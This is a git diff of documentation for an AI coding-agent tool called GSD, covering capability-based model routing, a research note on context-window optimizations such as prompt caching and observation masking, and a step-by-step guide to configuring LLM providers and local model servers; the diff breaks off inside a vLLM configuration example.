GSD_ALLOWED_COMMAND_PREFIXES="pass,op,sops,doppler" +``` + +> **Note:** This setting is global-only. Project-level settings.json (`/.gsd/settings.json`) cannot override the command allowlist — this prevents a cloned repo from escalating command execution privileges. + ### Custom Headers ```json diff --git a/docs/dynamic-model-routing.md b/docs/dynamic-model-routing.md index 9d0d5525e..bc88df2bd 100644 --- a/docs/dynamic-model-routing.md +++ b/docs/dynamic-model-routing.md @@ -1,12 +1,20 @@ # Dynamic Model Routing -*Introduced in v2.19.0* +*Introduced in v2.19.0. Capability scoring introduced in v2.52.0.* Dynamic model routing automatically selects cheaper models for simple work and reserves expensive models for complex tasks. This reduces token consumption by 20-50% on capped plans without sacrificing quality where it matters. +Starting in v2.52.0, the router uses **capability-aware scoring** to select the *best fit* model for each task, not just the cheapest one in the tier. + ## How It Works -Each unit dispatched by auto-mode is classified into a complexity tier: +Each unit dispatched by auto-mode passes through a two-stage pipeline: + +**Stage 1: Complexity classification** — classifies the work into a tier (light/standard/heavy). + +**Stage 2: Capability scoring** — within the eligible tier, ranks available models by how well their capabilities match the task's requirements. + +The key rule: **downgrade-only semantics**. The user's configured model is always the ceiling — routing never upgrades beyond what you've configured. | Tier | Typical Work | Default Model Level | |------|-------------|-------------------| @@ -14,8 +22,6 @@ Each unit dispatched by auto-mode is classified into a complexity tier: | **Standard** | Research, planning, execution, milestone completion | Sonnet-class | | **Heavy** | Replanning, roadmap reassessment, complex execution | Opus-class | -The router then selects a model for that tier. The key rule: **downgrade-only semantics**. The user's configured model is always the ceiling — routing never upgrades beyond what you've configured. - ## Enabling Dynamic routing is off by default. Enable it in preferences: @@ -41,6 +47,7 @@ dynamic_routing: budget_pressure: true # auto-downgrade when approaching budget ceiling (default: true) cross_provider: true # consider models from other providers (default: true) hooks: true # apply routing to post-unit hooks (default: true) + capability_routing: true # enable capability scoring within tier (default: true) ``` ### `tier_models` @@ -70,6 +77,157 @@ When approaching the budget ceiling, the router progressively downgrades: When enabled, the router may select models from providers other than your primary. This uses the built-in cost table to find the cheapest model at each tier. Requires the target provider to be configured. +### `capability_routing` + +When enabled (default: true), the router uses capability scoring to pick the best model in a tier rather than always defaulting to the cheapest. Set to `false` to revert to cheapest-in-tier behavior: + +```yaml +dynamic_routing: + enabled: true + capability_routing: false # disable scoring, use cheapest-in-tier +``` + +## Capability Profiles + +Each model has a built-in **capability profile** — a 7-dimension score (0–100) representing how well it handles different task types: + +| Dimension | What It Represents | +|-----------|-------------------| +| `coding` | Code generation and implementation accuracy | +| `debugging` | Diagnosing and fixing errors | +| `research` | Synthesizing information and exploring topics | +| `reasoning` | Multi-step logical reasoning | +| `speed` | Latency and throughput (inverse of capability depth) | +| `longContext` | Handling large codebases and long documents | +| `instruction` | Following structured instructions precisely | + +**Built-in profiles** exist for 9 models: `claude-opus-4-6`, `claude-sonnet-4-6`, `claude-haiku-4-5`, `gpt-4o`, `gpt-4o-mini`, `gemini-2.5-pro`, `gemini-2.0-flash`, `deepseek-chat`, `o3`. + +Models without a built-in profile receive **uniform scores of 50** across all dimensions. This is a cold-start policy — unknown models compete but don't have an advantage. From the user's perspective, routing behaves the same as before capability scoring was introduced for those models. + +**Profiles are heuristic rankings, not benchmarks.** They represent approximate relative strengths, not verified benchmark results. Use user overrides (below) to correct them for models you know well. + +## How Scoring Works + +The routing pipeline within a tier: + +``` +classify complexity tier + ↓ +filter eligible models for tier + ↓ +fire before_model_select hook (optional override) + ↓ +capability score eligible models + ↓ +select winner (or first eligible if scoring is disabled) +``` + +**Scoring formula:** weighted average of capability dimensions + +``` +score = Σ(weight × capability) / Σ(weights) +``` + +**Task requirements** are dynamic — different task types weight dimensions differently: + +| Unit Type | Key Dimensions | +|-----------|---------------| +| `execute-task` | coding (0.9), instruction (0.7), speed (0.3) | +| `research-*` | research (0.9), longContext (0.7), reasoning (0.5) | +| `plan-*` | reasoning (0.9), coding (0.5) | +| `replan-slice` | reasoning (0.9), debugging (0.6), coding (0.5) | +| `complete-slice`, `run-uat` | instruction (0.8), speed (0.7) | + +For `execute-task`, requirements are further refined by task metadata signals: +- Tags like `docs`, `config`, `readme` → boost instruction weight +- Keywords like `concurrency`, `compatibility` → boost debugging and reasoning +- Keywords like `migration`, `architecture` → boost reasoning and coding +- Large file counts (≥6) or large estimated line counts (≥500) → boost coding and reasoning + +**Tie-breaking:** When two models score within 2 points of each other, the cheaper model wins. If costs are equal, lexicographic model ID breaks the tie (deterministic). + +## User Overrides + +Correct built-in capability profiles for models you know well using `modelOverrides` in your models configuration: + +```json +{ + "providers": { + "anthropic": { + "modelOverrides": { + "claude-sonnet-4-6": { + "capabilities": { + "debugging": 90, + "research": 85 + } + } + } + } + } +} +``` + +Overrides are **deep-merged** with built-in defaults — only the specified dimensions are overridden; others retain their built-in values. + +**Use case:** You've found that a model consistently outperforms its built-in profile on specific task types. Override the relevant dimensions to steer the router toward that model for those tasks. + +## Verbose Output + +When verbose mode is active, the router logs its routing decision. When capability scoring was used, the log includes a full scoring breakdown: + +``` +Dynamic routing [S]: claude-sonnet-4-6 (capability-scored) — claude-sonnet-4-6: 82.3, gpt-4o: 78.1, deepseek-chat: 72.0 +``` + +When tier-only routing was used (scoring disabled, single eligible model, or routing guards applied): + +``` +Dynamic routing [S]: claude-sonnet-4-6 (standard complexity, multiple steps) +``` + +The `selectionMethod` field in the routing decision indicates which path was taken: +- `"capability-scored"` — capability scoring selected the winner +- `"tier-only"` — cheapest in tier (or explicit pin) was used + +## Extension Hook + +Extensions can intercept and override model selection using the `before_model_select` hook. + +The hook fires **after** tier filtering (eligible models are known) and **before** capability scoring (scores have not been computed yet). A hook can override selection entirely or return `undefined` to let scoring proceed normally. + +**Registering a handler:** + +```typescript +pi.on("before_model_select", async (event) => { + const { unitType, unitId, classification, taskMetadata, eligibleModels, phaseConfig } = event; + + // Custom routing strategy: always use gemini for research tasks + if (unitType.startsWith("research-")) { + const gemini = eligibleModels.find(id => id.includes("gemini")); + if (gemini) return { modelId: gemini }; + } + + // Return undefined to let capability scoring proceed + return undefined; +}); +``` + +**Event payload:** + +| Field | Type | Description | +|-------|------|-------------| +| `unitType` | `string` | The unit type being dispatched (e.g., `"execute-task"`) | +| `unitId` | `string` | Unique identifier for this unit dispatch | +| `classification` | `{ tier, reason, downgraded }` | The complexity classification result | +| `taskMetadata` | `Record \| undefined` | Task metadata extracted from the unit plan | +| `eligibleModels` | `string[]` | Models eligible for the classified tier | +| `phaseConfig` | `{ primary, fallbacks } \| undefined` | The user's configured model for this phase | + +**Return value:** `{ modelId: string }` to override selection, or `undefined` to defer to capability scoring. + +**First-override-wins:** If multiple extensions register handlers, the first one to return a non-undefined result wins. Subsequent handlers are not called. + ## Complexity Classification Units are classified using pure heuristics — no LLM calls, sub-millisecond: diff --git a/docs/getting-started.md b/docs/getting-started.md index bd79f868e..6fbcf2422 100644 --- a/docs/getting-started.md +++ b/docs/getting-started.md @@ -39,6 +39,10 @@ GSD is also available as a VS Code extension. Install from the marketplace (publ The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC. +### Web Interface + +GSD also has a browser-based interface. Run `gsd --web` to start a local web server with a visual dashboard, real-time progress, and multi-project support. See [Web Interface](./web-interface.md) for details. + ## First Launch Run `gsd` in any directory: @@ -54,6 +58,8 @@ GSD displays a welcome screen showing your version, active model, and available If you have an existing Pi installation, provider credentials are imported automatically. +For detailed setup instructions for specific providers (OpenRouter, Ollama, LM Studio, vLLM, and more), see the [Provider Setup Guide](./providers.md). + Re-run the wizard anytime with: ```bash diff --git a/docs/git-strategy.md b/docs/git-strategy.md index 40576256f..c8274b7d0 100644 --- a/docs/git-strategy.md +++ b/docs/git-strategy.md @@ -36,10 +36,10 @@ Use this for hot-reload workflows where file isolation breaks dev tooling (e.g., main ───────────────────────────────────────────────────────── │ ↑ └── milestone/M001 (worktree) ────────────────────────┘ - commit: feat(S01/T01): core types - commit: feat(S01/T02): markdown parser - commit: feat(S01/T03): file writer - commit: docs(M001/S01): workflow docs + commit: feat: core types + commit: feat: markdown parser + commit: feat: file writer + commit: docs: workflow docs ... → squash-merged to main as single commit ``` @@ -56,13 +56,13 @@ With [parallel orchestration](./parallel-orchestration.md) enabled, multiple mil main ────────────────────────────────────────────────────────── │ ↑ ↑ ├── milestone/M002 (worktree) ─────────┘ │ - │ commit: feat(S01/T01): auth types │ - │ commit: feat(S01/T02): JWT middleware │ + │ commit: feat: auth types │ + │ commit: feat: JWT middleware │ │ → squash-merged first │ │ │ └── milestone/M003 (worktree) ────────────────────────┘ - commit: feat(S01/T01): dashboard layout - commit: feat(S01/T02): chart components + commit: feat: dashboard layout + commit: feat: chart components → squash-merged second ``` @@ -75,13 +75,16 @@ Each worktree operates on its own branch with its own commit history. Merges hap ### Commit Format -Commits use conventional commit format with scope: +Commits use conventional commit format with GSD metadata in trailers: ``` -feat(S01/T01): core type definitions -feat(S01/T02): markdown parser for plan files -fix(M001/S03): bug fixes and doc corrections -docs(M001/S04): workflow documentation +feat: core type definitions + +GSD-Task: M001/S01/T01 + +feat: markdown parser for plan files + +GSD-Task: M001/S01/T02 ``` ## Worktree Management diff --git a/docs/parallel-orchestration.md b/docs/parallel-orchestration.md index 6b611291d..40463fa95 100644 --- a/docs/parallel-orchestration.md +++ b/docs/parallel-orchestration.md @@ -126,7 +126,7 @@ File overlaps are warnings, not blockers. Both milestones work in separate workt ## Configuration -Add to `~/.gsd/preferences.md` or `.gsd/preferences.md`: +Add to `~/.gsd/PREFERENCES.md` or `.gsd/PREFERENCES.md`: ```yaml --- diff --git a/docs/pi-context-optimization-opportunities.md b/docs/pi-context-optimization-opportunities.md new file mode 100644 index 000000000..9e34cc44c --- /dev/null +++ b/docs/pi-context-optimization-opportunities.md @@ -0,0 +1,198 @@ +# pi-coding-agent: Context Optimization Opportunities + +> **Status**: Research only — not planned for implementation. +> Scope: `packages/pi-coding-agent` and `packages/pi-agent-core` infrastructure. +> These changes would benefit every consumer of the pi engine, not just GSD. + +--- + +## 1. Prompt Caching (`cache_control`) — Highest Impact + +**Current state**: Every LLM call re-pays full input token cost for the system prompt, tool definitions, and context files. No `cache_control` breakpoints are set anywhere in the API call path. + +**Opportunity**: Anthropic's KV cache delivers 90% cost reduction on cached tokens (0.1x input rate). Claude Code achieves 92–98% cache hit rates by placing stable content before volatile content. + +**Where to instrument** (`packages/pi-ai/src/providers/anthropic.ts`): +- Set `cache_control: { type: "ephemeral" }` on the last tool definition block +- Set `cache_control` after the static system prompt sections (base boilerplate + context files) +- Leave the per-turn user message uncached + +**Critical constraint**: The cache breakpoint must be placed *after* all static content and *before* any dynamic content (timestamps, per-request variables). Moving a timestamp before a cache breakpoint defeats it on every call. + +**Cache hierarchy**: Tools → system → messages. Changing a tool definition invalidates system and message caches. Tool definitions should be sorted deterministically (alphabetically) to prevent spurious cache misses. + +**Expected savings**: 80–90% reduction in input token cost for multi-turn sessions (the dominant cost pattern in GSD auto-mode). + +--- + +## 2. Observation Masking in the Message Pipeline + +**Current state**: `agent-loop.ts` passes the full `context.messages` array to the LLM on every turn. Tool results from 50 turns ago are re-read in full on every subsequent call. The `transformContext` hook exists on `AgentContext` and fires before every LLM call, but has no default implementation — extensions are responsible for any pruning. + +**Opportunity**: Replace old tool result content with lightweight placeholders after N turns. JetBrains Research tested this on SWE-bench Verified (500 tasks, up to 250-turn trajectories) and found: +- 50%+ cost reduction vs. unmanaged history +- Performance matched or slightly exceeded LLM summarization +- Zero overhead (no extra LLM call required) + +**Proposed implementation** (default `transformContext` in `pi-agent-core`): +```typescript +// Keep last KEEP_RECENT_TURNS verbatim; mask older tool results +const KEEP_RECENT_TURNS = 8; + +function defaultObservationMask(messages: AgentMessage[]): AgentMessage[] { + const cutoff = findTurnBoundary(messages, KEEP_RECENT_TURNS); + return messages.map((m, i) => { + if (i >= cutoff) return m; + if (m.type === "toolResult" || m.type === "bashExecution") { + return { ...m, content: "[result masked — within summarized history]", excludeFromContext: false }; + } + return m; + }); +} +``` + +**Compaction interaction**: Observation masking reduces the token accumulation rate, pushing the compaction threshold further out. The two mechanisms are complementary — masking handles the steady state, compaction handles the rare deep-session case. + +--- + +## 3. Earlier Compaction Threshold + +**Current state** (`packages/pi-coding-agent/src/core/constants.ts`): +```typescript +COMPACTION_RESERVE_TOKENS = 16_384 // triggers at contextWindow - 16K +COMPACTION_KEEP_RECENT_TOKENS = 20_000 +``` + +For a 200K context window, compaction fires at ~183K tokens — 91.5% utilization. + +**Problem**: Context drift (not raw exhaustion) causes ~65% of enterprise agent failures. Performance degrades measurably beyond ~30K tokens per Zylos production data. The current threshold lets sessions run degraded for a long stretch before compaction fires. + +**Opportunity**: Lower the trigger to 70% utilization. For a 200K window, this means compacting at ~140K tokens — 43K tokens earlier. + +```typescript +// Proposed +COMPACTION_THRESHOLD_PERCENT = 0.70 // fire at 70% of contextWindow +COMPACTION_RESERVE_TOKENS = contextWindow * (1 - COMPACTION_THRESHOLD_PERCENT) +``` + +**Trade-off**: More frequent compactions, each happening earlier when there's more "fresh" content to keep. Summary quality improves because less material needs to be discarded at each cut. + +--- + +## 4. Tool Result Truncation at Write Time + +**Current state**: `TOOL_RESULT_MAX_CHARS = 2_000` in `constants.ts`, but this limit is only applied *during compaction summarization*, not when the tool result enters the message store. A bash result returning 50KB of log output is stored and re-sent verbatim until compaction fires. + +**Opportunity**: Truncate at write time in `messages.ts` → `convertToLlm()` or in the tool result handler. Two strategies: + +- **Hard truncation**: Slice at N chars, append `"\n[truncated — {original_length} chars]"`. Simple, zero overhead. +- **Semantic head/tail**: Keep first 500 chars (context, command echo) + last 1000 chars (final output, errors). Better for bash results where the end contains the error. + +**Recommendation**: Semantic head/tail as the default, configurable per tool type. File read results benefit from head; bash/test output benefits from head+tail. + +--- + +## 5. Context File Deduplication and Trim + +**Current state** (`packages/pi-coding-agent/src/core/resource-loader.ts`, lines 84–109): +- Searches from `~/.gsd/agent/` → ancestor dirs → cwd +- Deduplicates by *file path* but not by *content* +- Entire file content concatenated verbatim into system prompt — no trimming, no summarization + +**Anti-pattern**: A project with AGENTS.md at 3 ancestor levels (repo root, workspace, home) injects all three in full. If they share common boilerplate, that content is re-injected multiple times. + +**Opportunities**: +1. **Content deduplication**: Hash paragraph-level chunks; skip any chunk already seen in a previously-loaded file +2. **Section-aware loading**: Parse `## ` headings in AGENTS.md; only include sections relevant to the current task type (e.g., `## Testing` section only when running tests) +3. **Token budget enforcement**: If total context files exceed N tokens, summarize oldest/most-distant file rather than including verbatim + +--- + +## 6. Skill Content Lazy Loading and Summarization + +**Current state**: When `/skill:name` is invoked, the full skill file content is injected inline as `...` in the user message. No chunking, no summarization. A 10KB skill file adds ~2,500 tokens to that turn. + +**Opportunity**: +- **Cached skill injection**: If the same skill is used across multiple turns (rare but possible), it's re-injected each time. Cache with `cache_control` after first injection. +- **Skill digest mode**: Inject a 200-token summary of the skill on first reference; full content only if the model requests it via a `get_skill_detail` tool call. Reduces cost for skills that don't end up being followed. +- **Skill prefetching**: Before a known long session (e.g., auto-mode start), pre-inject all likely skills with `cache_control` so they're cached for the entire session. + +--- + +## 7. Token Estimation Accuracy + +**Current state** (`compaction.ts`, line 216): `chars / 4` heuristic. This overestimates token count for English prose (~3.5 chars/token) and underestimates for code with short identifiers or Unicode. + +**Opportunity**: Use a proper tokenizer. +- `@anthropic-ai/tokenizer` (tiktoken-compatible, ships with the SDK) — accurate but ~5ms per call +- Tiered approach: use chars/4 for display; use proper tokenizer only for compaction threshold decisions (where accuracy matters) + +**Impact**: More accurate compaction timing, fewer unnecessary compactions, slightly better `COMPACTION_KEEP_RECENT_TOKENS` boundary placement. + +--- + +## 8. Format: Markdown over XML for Internal Context + +**Current state**: The message pipeline uses ``, ``, `` XML wrappers in several places. System prompt sections are largely prose Markdown. + +**Findings**: XML tags carry 15–40% more tokens than equivalent Markdown for the same semantic content, due to paired open/close tags. However, Claude was optimized for XML and shows higher accuracy on tasks requiring precise section parsing. + +**Recommendation**: Audit XML usage in the pipeline and convert to Markdown where the content is: +- Non-nested (flat instructions, status messages) +- Human-readable rather than machine-parsed by the model +- Not requiring precise boundary detection + +Keep XML for: few-shot examples with ambiguous boundaries, skill content (requires precise isolation from surrounding text), compaction summaries that the model must treat as authoritative history. + +**Estimated savings**: 5–15% reduction in system prompt token count. + +--- + +## 9. Dynamic Tool Set Delivery + +**Current state**: All tool definitions are included in every LLM request. Tool descriptions consume 60–80% of input tokens in static configurations. As new extensions register tools, the baseline grows linearly. + +**Opportunity** (higher complexity): Implement the three-function Dynamic Toolset pattern: +1. `search_tools(query)` — semantic search over tool catalog +2. `describe_tools(ids[])` — fetch full schemas on demand +3. `execute_tool(id, params)` — unchanged execution + +Speakeasy measured 91–97% token reduction with 100% task success rate. Trade-off: 2–3x more tool calls, ~50% longer wall time. Net cost dramatically lower. + +**Feasibility for pi**: The tool registry (`packages/pi-coding-agent/src/core/tool-registry.ts`) already stores tool metadata separately from definitions. The primary engineering work is the semantic search index and the `describe_tools` / `search_tools` tool implementations. + +--- + +## 10. Cost Attribution and Per-Phase Reporting + +**Current state**: `SessionManager.getUsageTotals()` accumulates cost across the entire session. No per-phase or per-agent breakdown is stored. Cost visibility is limited to the footer total and `GSD_SHOW_TOKEN_COST=1` per-turn display. + +**Opportunity**: Emit structured cost events that extensions can subscribe to: +```typescript +interface CostCheckpointEvent { + type: "cost_checkpoint"; + label: string; // "discuss-phase", "execute-slice-3" + deltaTokens: Usage; // tokens since last checkpoint + cumulativeTokens: Usage; + cumulativeCost: number; +} +``` + +GSD extension could consume these events to surface per-milestone cost in `/gsd stats` and flag milestones that are disproportionately expensive — enabling budget-aware planning. + +--- + +## Implementation Ordering (if pursued) + +| Priority | Item | Effort | Expected Impact | +|----------|------|--------|-----------------| +| 1 | Prompt caching (`cache_control`) | Low | 80–90% input cost reduction | +| 2 | Earlier compaction threshold (70%) | Trivial | Reduces drift in long sessions | +| 3 | Tool result truncation at write time | Low | Reduces context bloat between compactions | +| 4 | Context file deduplication | Medium | Variable — high for multi-level AGENTS.md setups | +| 5 | Observation masking (default `transformContext`) | Medium | 50%+ on long-running agents | +| 6 | Token estimation (proper tokenizer) | Low | Accuracy improvement, minor cost impact | +| 7 | Markdown over XML audit | Low | 5–15% system prompt reduction | +| 8 | Skill caching with `cache_control` | Low | Meaningful for skill-heavy sessions | +| 9 | Dynamic tool set delivery | High | 90%+ on large tool catalogs; major architecture change | +| 10 | Per-phase cost attribution events | Medium | Visibility only; enables future budget routing | diff --git a/docs/pr-1530/01-full.png b/docs/pr-1530/01-full.png deleted file mode 100644 index 032098a0a..000000000 Binary files a/docs/pr-1530/01-full.png and /dev/null differ diff --git a/docs/pr-1530/02-small.png b/docs/pr-1530/02-small.png deleted file mode 100644 index 7221c0d76..000000000 Binary files a/docs/pr-1530/02-small.png and /dev/null differ diff --git a/docs/pr-1530/03-min.png b/docs/pr-1530/03-min.png deleted file mode 100644 index 4e93052a9..000000000 Binary files a/docs/pr-1530/03-min.png and /dev/null differ diff --git a/docs/pr-1530/04-unhealthy.png b/docs/pr-1530/04-unhealthy.png deleted file mode 100644 index 2d62e88be..000000000 Binary files a/docs/pr-1530/04-unhealthy.png and /dev/null differ diff --git a/docs/pr-876/01-index.png b/docs/pr-876/01-index.png deleted file mode 100644 index dc2957b92..000000000 Binary files a/docs/pr-876/01-index.png and /dev/null differ diff --git a/docs/pr-876/02-summary.png b/docs/pr-876/02-summary.png deleted file mode 100644 index dea9d8cb1..000000000 Binary files a/docs/pr-876/02-summary.png and /dev/null differ diff --git a/docs/pr-876/03-progress.png b/docs/pr-876/03-progress.png deleted file mode 100644 index 9dec3856b..000000000 Binary files a/docs/pr-876/03-progress.png and /dev/null differ diff --git a/docs/pr-876/04-depgraph.png b/docs/pr-876/04-depgraph.png deleted file mode 100644 index b1349dead..000000000 Binary files a/docs/pr-876/04-depgraph.png and /dev/null differ diff --git a/docs/pr-876/05-metrics.png b/docs/pr-876/05-metrics.png deleted file mode 100644 index bb8083030..000000000 Binary files a/docs/pr-876/05-metrics.png and /dev/null differ diff --git a/docs/pr-876/06-changelog.png b/docs/pr-876/06-changelog.png deleted file mode 100644 index c79e00f2d..000000000 Binary files a/docs/pr-876/06-changelog.png and /dev/null differ diff --git a/docs/pr-876/06-timeline.png b/docs/pr-876/06-timeline.png deleted file mode 100644 index 62d081703..000000000 Binary files a/docs/pr-876/06-timeline.png and /dev/null differ diff --git a/docs/pr-876/07-changelog.png b/docs/pr-876/07-changelog.png deleted file mode 100644 index f279f6d95..000000000 Binary files a/docs/pr-876/07-changelog.png and /dev/null differ diff --git a/docs/pr-876/07-knowledge.png b/docs/pr-876/07-knowledge.png deleted file mode 100644 index 2e7e32952..000000000 Binary files a/docs/pr-876/07-knowledge.png and /dev/null differ diff --git a/docs/pr-876/08-knowledge.png b/docs/pr-876/08-knowledge.png deleted file mode 100644 index 14a4dd33b..000000000 Binary files a/docs/pr-876/08-knowledge.png and /dev/null differ diff --git a/docs/pr-876/09-captures.png b/docs/pr-876/09-captures.png deleted file mode 100644 index f3c29a40e..000000000 Binary files a/docs/pr-876/09-captures.png and /dev/null differ diff --git a/docs/pr-876/10-artifacts.png b/docs/pr-876/10-artifacts.png deleted file mode 100644 index 7aab45ec9..000000000 Binary files a/docs/pr-876/10-artifacts.png and /dev/null differ diff --git a/docs/providers.md b/docs/providers.md new file mode 100644 index 000000000..984ee369c --- /dev/null +++ b/docs/providers.md @@ -0,0 +1,587 @@ +# Provider Setup Guide + +Step-by-step setup instructions for every LLM provider GSD supports. If you ran the onboarding wizard (`gsd config`) and picked a provider, you may already be configured — check with `/model` inside a session. + +## Table of Contents + +- [Quick Reference](#quick-reference) +- [Built-in Providers](#built-in-providers) + - [Anthropic (Claude)](#anthropic-claude) + - [OpenAI](#openai) + - [Google Gemini](#google-gemini) + - [OpenRouter](#openrouter) + - [Groq](#groq) + - [xAI (Grok)](#xai-grok) + - [Mistral](#mistral) + - [GitHub Copilot](#github-copilot) + - [Amazon Bedrock](#amazon-bedrock) + - [Anthropic on Vertex AI](#anthropic-on-vertex-ai) + - [Azure OpenAI](#azure-openai) +- [Local Providers](#local-providers) + - [Ollama](#ollama) + - [LM Studio](#lm-studio) + - [vLLM](#vllm) + - [SGLang](#sglang) +- [Custom OpenAI-Compatible Endpoints](#custom-openai-compatible-endpoints) +- [Common Pitfalls](#common-pitfalls) +- [Verifying Your Setup](#verifying-your-setup) + +## Quick Reference + +| Provider | Auth Method | Env Variable | Config File | +|----------|-------------|-------------|-------------| +| Anthropic | OAuth or API key | `ANTHROPIC_API_KEY` | — | +| OpenAI | API key | `OPENAI_API_KEY` | — | +| Google Gemini | API key | `GEMINI_API_KEY` | — | +| OpenRouter | API key | `OPENROUTER_API_KEY` | Optional `models.json` | +| Groq | API key | `GROQ_API_KEY` | — | +| xAI | API key | `XAI_API_KEY` | — | +| Mistral | API key | `MISTRAL_API_KEY` | — | +| GitHub Copilot | OAuth | `GH_TOKEN` | — | +| Amazon Bedrock | IAM credentials | `AWS_PROFILE` or `AWS_ACCESS_KEY_ID` | — | +| Vertex AI | ADC | `GOOGLE_APPLICATION_CREDENTIALS` | — | +| Azure OpenAI | API key | `AZURE_OPENAI_API_KEY` | — | +| Ollama | None (local) | — | `models.json` required | +| LM Studio | None (local) | — | `models.json` required | +| vLLM / SGLang | None (local) | — | `models.json` required | + +--- + +## Built-in Providers + +Built-in providers have models pre-registered in GSD. You only need to supply credentials. + +### Anthropic (Claude) + +**Recommended.** Anthropic models have the deepest integration: built-in web search, extended thinking, and prompt caching. + +**Option A — Browser sign-in (recommended):** + +```bash +gsd config +# Choose "Sign in with your browser" → "Anthropic (Claude)" +``` + +Or inside a session: `/login` + +**Option B — API key:** + +```bash +export ANTHROPIC_API_KEY="sk-ant-..." +``` + +Or paste it during `gsd config` when prompted. + +**Get a key:** [console.anthropic.com/settings/keys](https://console.anthropic.com/settings/keys) + +### OpenAI + +```bash +export OPENAI_API_KEY="sk-..." +``` + +Or run `gsd config` and choose "Paste an API key" then "OpenAI". + +**Get a key:** [platform.openai.com/api-keys](https://platform.openai.com/api-keys) + +### Google Gemini + +```bash +export GEMINI_API_KEY="..." +``` + +**Get a key:** [aistudio.google.com/app/apikey](https://aistudio.google.com/app/apikey) + +### OpenRouter + +OpenRouter aggregates 200+ models from multiple providers behind a single API key. + +**Step 1 — Get your API key:** + +Go to [openrouter.ai/keys](https://openrouter.ai/keys) and create a key. + +**Step 2 — Set the key:** + +```bash +export OPENROUTER_API_KEY="sk-or-..." +``` + +Or run `gsd config`, choose "Paste an API key", then "OpenRouter". + +**Step 3 — Switch to an OpenRouter model:** + +Inside a GSD session, type `/model` and select an OpenRouter model. Models are prefixed with `openrouter/` (e.g., `openrouter/anthropic/claude-sonnet-4`). + +**Optional — Add custom OpenRouter models via `models.json`:** + +If you want models not in the built-in list, add them to `~/.gsd/agent/models.json`: + +```json +{ + "providers": { + "openrouter": { + "baseUrl": "https://openrouter.ai/api/v1", + "apiKey": "OPENROUTER_API_KEY", + "api": "openai-completions", + "models": [ + { + "id": "meta-llama/llama-3.3-70b", + "name": "Llama 3.3 70B (OpenRouter)", + "reasoning": false, + "input": ["text"], + "contextWindow": 131072, + "maxTokens": 32768, + "cost": { "input": 0.3, "output": 0.3, "cacheRead": 0, "cacheWrite": 0 } + } + ] + } + } +} +``` + +Note: the `apiKey` field here is the *name* of the environment variable, not the literal key. GSD resolves it automatically. You can also use a literal value or a shell command (see [Value Resolution](./custom-models.md#value-resolution)). + +**Optional — Route through specific providers:** + +Use `modelOverrides` to control which upstream provider OpenRouter uses: + +```json +{ + "providers": { + "openrouter": { + "modelOverrides": { + "anthropic/claude-sonnet-4": { + "compat": { + "openRouterRouting": { + "only": ["amazon-bedrock"] + } + } + } + } + } + } +} +``` + +### Groq + +```bash +export GROQ_API_KEY="gsk_..." +``` + +**Get a key:** [console.groq.com/keys](https://console.groq.com/keys) + +### xAI (Grok) + +```bash +export XAI_API_KEY="xai-..." +``` + +**Get a key:** [console.x.ai](https://console.x.ai) + +### Mistral + +```bash +export MISTRAL_API_KEY="..." +``` + +**Get a key:** [console.mistral.ai/api-keys](https://console.mistral.ai/api-keys) + +### GitHub Copilot + +Uses OAuth — sign in through the browser: + +```bash +gsd config +# Choose "Sign in with your browser" → "GitHub Copilot" +``` + +Requires an active GitHub Copilot subscription. + +### Amazon Bedrock + +Bedrock uses AWS IAM credentials, not API keys. Any of these work: + +```bash +# Option 1: Named profile +export AWS_PROFILE="my-profile" + +# Option 2: IAM keys +export AWS_ACCESS_KEY_ID="AKIA..." +export AWS_SECRET_ACCESS_KEY="..." +export AWS_REGION="us-east-1" + +# Option 3: Bedrock API key (bearer token) +export AWS_BEARER_TOKEN_BEDROCK="..." +``` + +ECS task roles and IRSA (Kubernetes) are also detected automatically. + +### Anthropic on Vertex AI + +Uses Google Cloud Application Default Credentials: + +```bash +gcloud auth application-default login +export ANTHROPIC_VERTEX_PROJECT_ID="my-project-id" +``` + +Or set `GOOGLE_CLOUD_PROJECT` and ensure ADC credentials exist at `~/.config/gcloud/application_default_credentials.json`. + +### Azure OpenAI + +```bash +export AZURE_OPENAI_API_KEY="..." +``` + +--- + +## Local Providers + +Local providers run on your machine. They require a `models.json` configuration file because GSD needs to know the endpoint URL and which models are available. + +**Config file location:** `~/.gsd/agent/models.json` + +The file reloads each time you open `/model` — no restart needed. + +### Ollama + +**Step 1 — Install and start Ollama:** + +```bash +# macOS +brew install ollama +ollama serve + +# Or download from https://ollama.com +``` + +**Step 2 — Pull a model:** + +```bash +ollama pull llama3.1:8b +ollama pull qwen2.5-coder:7b +``` + +**Step 3 — Create `~/.gsd/agent/models.json`:** + +```json +{ + "providers": { + "ollama": { + "baseUrl": "http://localhost:11434/v1", + "api": "openai-completions", + "apiKey": "ollama", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { "id": "llama3.1:8b" }, + { "id": "qwen2.5-coder:7b" } + ] + } + } +} +``` + +The `apiKey` is required by the config schema but Ollama ignores it — any value works. + +**Step 4 — Select the model:** + +Inside GSD, type `/model` and pick your Ollama model. + +**Ollama tips:** +- Ollama does not support the `developer` role or `reasoning_effort` — always set `compat.supportsDeveloperRole: false` and `compat.supportsReasoningEffort: false`. +- If you get empty responses, check that `ollama serve` is running and the model is pulled. +- Context window and max tokens default to 128K / 16K if not specified. Override these if your model has different limits. + +### LM Studio + +**Step 1 — Install LM Studio:** + +Download from [lmstudio.ai](https://lmstudio.ai). + +**Step 2 — Start the local server:** + +In LM Studio, go to the "Local Server" tab, load a model, and click "Start Server". The default port is 1234. + +**Step 3 — Create `~/.gsd/agent/models.json`:** + +```json +{ + "providers": { + "lm-studio": { + "baseUrl": "http://localhost:1234/v1", + "api": "openai-completions", + "apiKey": "lm-studio", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { + "id": "your-model-name", + "name": "My Local Model", + "contextWindow": 32768, + "maxTokens": 4096 + } + ] + } + } +} +``` + +Replace `your-model-name` with the model identifier shown in LM Studio's server tab. + +**LM Studio tips:** +- The model ID in `models.json` must match what LM Studio reports in its server API. Check the server tab for the exact string. +- LM Studio defaults to port 1234. If you changed it, update `baseUrl` accordingly. +- Increase `contextWindow` and `maxTokens` if your model supports larger contexts. + +### vLLM + +```json +{ + "providers": { + "vllm": { + "baseUrl": "http://localhost:8000/v1", + "api": "openai-completions", + "apiKey": "vllm", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false, + "supportsUsageInStreaming": false + }, + "models": [ + { + "id": "meta-llama/Llama-3.1-8B-Instruct", + "contextWindow": 128000, + "maxTokens": 16384 + } + ] + } 